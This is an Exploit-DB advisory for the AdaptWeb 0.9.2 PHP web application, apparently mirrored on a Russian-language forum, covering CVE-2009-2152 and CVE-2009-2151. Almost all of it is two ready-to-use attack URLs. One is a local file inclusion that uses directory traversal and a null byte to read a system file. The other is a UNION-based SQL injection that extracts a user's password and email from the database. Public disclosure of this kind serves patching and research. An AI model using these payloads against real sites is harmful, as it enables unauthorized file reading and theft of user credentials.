- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8954
- Проверка EDB
-
- Пройдено
- Автор
- SIRGOD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-2152 cve-2009-2151
- Дата публикации
- 2009-06-15
Код:
#################################################################################################################
[+] AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities
[+] Script : http://adaptweb.sourceforge.net/
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################
[+] Script homepage : http://adaptweb.sourceforge.net/
[+] Local File Inclusion
- PoC
http://127.0.0.1/[path]/index.php?newlang=../../../../../../BOOTSECT.BAK%00
[+] SQL Injection
- PoC
http://127.0.0.1/[path]/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1
#################################################################################################################
# milw0rm.com [2009-06-15]- Источник
- www.exploit-db.com
